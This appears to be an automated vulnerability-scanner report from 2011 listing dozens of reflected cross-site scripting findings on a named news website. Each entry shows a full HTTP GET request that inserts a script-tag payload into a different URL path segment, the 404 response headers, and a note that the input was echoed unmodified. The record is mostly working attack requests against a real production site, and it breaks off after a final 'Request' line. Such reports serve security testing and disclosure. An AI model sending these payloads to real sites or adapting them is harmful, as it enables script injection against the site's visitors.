This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /r/SysConfig/WebPortal/nypost/blocks/_news/local/events564c4<script>alert(1)</script>5026bd0f88f/local_events.js HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 727 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:33:12 GMT Connection: close
The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 15f35<script>alert(1)</script>bfd25e01ef7 was submitted in the REST URL parameter 9. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /r/SysConfig/WebPortal/nypost/blocks/_news/local/events/local_events.js15f35<script>alert(1)</script>bfd25e01ef7 HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 727 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:33:17 GMT Connection: close
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload ba4a2<script>alert(1)</script>9a45b26121c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /r/SysConfigba4a2<script>alert(1)</script>9a45b26121c/WebPortal/nypost/blocks/_news/local/local.css HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 714 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:32:48 GMT Connection: close
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 6d6eb<script>alert(1)</script>20becc93b14 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /r/SysConfig/WebPortal6d6eb<script>alert(1)</script>20becc93b14/nypost/blocks/_news/local/local.css HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 714 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:32:53 GMT Connection: close
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 7c295<script>alert(1)</script>60a0cb9624a was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /r/SysConfig/WebPortal/nypost7c295<script>alert(1)</script>60a0cb9624a/blocks/_news/local/local.css HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 714 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:32:57 GMT Connection: close
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 8ace1<script>alert(1)</script>d7a993fb0dc was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /r/SysConfig/WebPortal/nypost/blocks8ace1<script>alert(1)</script>d7a993fb0dc/_news/local/local.css HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 714 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:33:01 GMT Connection: close
The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 5ebb5<script>alert(1)</script>9713bc263f was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /r/SysConfig/WebPortal/nypost/blocks/_news5ebb5<script>alert(1)</script>9713bc263f/local/local.css HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 713 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:33:03 GMT Connection: close
The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload 5cbd0<script>alert(1)</script>a29d0400b7c was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /r/SysConfig/WebPortal/nypost/blocks/_news/local5cbd0<script>alert(1)</script>a29d0400b7c/local.css HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 714 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:33:06 GMT Connection: close
The value of REST URL parameter 8 is copied into the HTML document as plain text between tags. The payload 84f1a<script>alert(1)</script>a87ff4a5d90 was submitted in the REST URL parameter 8. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /r/SysConfig/WebPortal/nypost/blocks/_news/local/local.css84f1a<script>alert(1)</script>a87ff4a5d90 HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 714 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:33:08 GMT Connection: close
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload a47ee<script>alert(1)</script>f31340ef57e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /r/SysConfiga47ee<script>alert(1)</script>f31340ef57e/WebPortal/nypost/blocks/_promos/promos_and_partners/promos_and_partners.js HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 743 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:33:29 GMT Connection: close
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 659e1<script>alert(1)</script>b1eba14ad45 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /r/SysConfig/WebPortal659e1<script>alert(1)</script>b1eba14ad45/nypost/blocks/_promos/promos_and_partners/promos_and_partners.js HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 743 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:33:31 GMT Connection: close
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload f5b39<script>alert(1)</script>4dd47e17859 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /r/SysConfig/WebPortal/nypostf5b39<script>alert(1)</script>4dd47e17859/blocks/_promos/promos_and_partners/promos_and_partners.js HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 743 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:33:33 GMT Connection: close
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload f43d7<script>alert(1)</script>5a12128219d was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /r/SysConfig/WebPortal/nypost/blocksf43d7<script>alert(1)</script>5a12128219d/_promos/promos_and_partners/promos_and_partners.js HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 743 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:33:35 GMT Connection: close
The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload f104b<script>alert(1)</script>125a1c5d4f2 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /r/SysConfig/WebPortal/nypost/blocks/_promosf104b<script>alert(1)</script>125a1c5d4f2/promos_and_partners/promos_and_partners.js HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 743 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:33:37 GMT Connection: close
The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload 76ef3<script>alert(1)</script>79757c82828 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /r/SysConfig/WebPortal/nypost/blocks/_promos/promos_and_partners76ef3<script>alert(1)</script>79757c82828/promos_and_partners.js HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 743 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:33:39 GMT Connection: close
The value of REST URL parameter 8 is copied into the HTML document as plain text between tags. The payload 4c350<script>alert(1)</script>d838fbfb9b4 was submitted in the REST URL parameter 8. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /r/SysConfig/WebPortal/nypost/blocks/_promos/promos_and_partners/promos_and_partners.js4c350<script>alert(1)</script>d838fbfb9b4 HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 743 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:33:40 GMT Connection: close
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 54bae<script>alert(1)</script>ae929d52e38 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /r/SysConfig54bae<script>alert(1)</script>ae929d52e38/WebPortal/nypost/blocks/ads/ads.js HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 703 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:33:11 GMT Connection: close
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 7c8df<script>alert(1)</script>30eeeeb7eba was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /r/SysConfig/WebPortal7c8df<script>alert(1)</script>30eeeeb7eba/nypost/blocks/ads/ads.js HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 703 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:33:13 GMT Connection: close
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload b2d77<script>alert(1)</script>2bb23490fb3 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /r/SysConfig/WebPortal/nypostb2d77<script>alert(1)</script>2bb23490fb3/blocks/ads/ads.js HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 703 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:33:15 GMT Connection: close
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload b1e4f<script>alert(1)</script>7ce5bb7f454 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /r/SysConfig/WebPortal/nypost/blocksb1e4f<script>alert(1)</script>7ce5bb7f454/ads/ads.js HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 703 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:33:17 GMT Connection: close
The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 61855<script>alert(1)</script>855e2b882b8 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /r/SysConfig/WebPortal/nypost/blocks/ads61855<script>alert(1)</script>855e2b882b8/ads.js HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 703 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:33:19 GMT Connection: close
The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload 9e496<script>alert(1)</script>4c16621050e was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /r/SysConfig/WebPortal/nypost/blocks/ads/ads.js9e496<script>alert(1)</script>4c16621050e HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 703 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:33:22 GMT Connection: close
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 3ec44<script>alert(1)</script>3d0ef34b2ab was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /r/SysConfig3ec44<script>alert(1)</script>3d0ef34b2ab/WebPortal/nypost/blocks/breaking_news_bar/breaking_news_bar.js HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 731 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:33:19 GMT Connection: close
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload b50d1<script>alert(1)</script>b5ffdc732ac was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /r/SysConfig/WebPortalb50d1<script>alert(1)</script>b5ffdc732ac/nypost/blocks/breaking_news_bar/breaking_news_bar.js HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 731 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:33:21 GMT Connection: close
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 9c792<script>alert(1)</script>e5e7146490c was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /r/SysConfig/WebPortal/nypost9c792<script>alert(1)</script>e5e7146490c/blocks/breaking_news_bar/breaking_news_bar.js HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 731 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:33:36 GMT Connection: close
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 32a8b<script>alert(1)</script>13e0d2bb0d8 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /r/SysConfig/WebPortal/nypost/blocks32a8b<script>alert(1)</script>13e0d2bb0d8/breaking_news_bar/breaking_news_bar.js HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 731 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:33:38 GMT Connection: close
The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload f0d4d<script>alert(1)</script>0ecfab08c53 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /r/SysConfig/WebPortal/nypost/blocks/breaking_news_barf0d4d<script>alert(1)</script>0ecfab08c53/breaking_news_bar.js HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 731 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:33:42 GMT Connection: close
The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload 1bc0a<script>alert(1)</script>fab6c4d0f2c was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /r/SysConfig/WebPortal/nypost/blocks/breaking_news_bar/breaking_news_bar.js1bc0a<script>alert(1)</script>fab6c4d0f2c HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 731 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:33:43 GMT Connection: close
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload fac0d<script>alert(1)</script>a5933bb83a5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /r/SysConfigfac0d<script>alert(1)</script>a5933bb83a5/WebPortal/nypost/blocks/calendar/calendar.css HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 714 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:33:02 GMT Connection: close
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 78004<script>alert(1)</script>edc93eee60c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /r/SysConfig/WebPortal78004<script>alert(1)</script>edc93eee60c/nypost/blocks/calendar/calendar.css HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 714 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:33:05 GMT Connection: close
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 2f079<script>alert(1)</script>f4dff419fbd was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
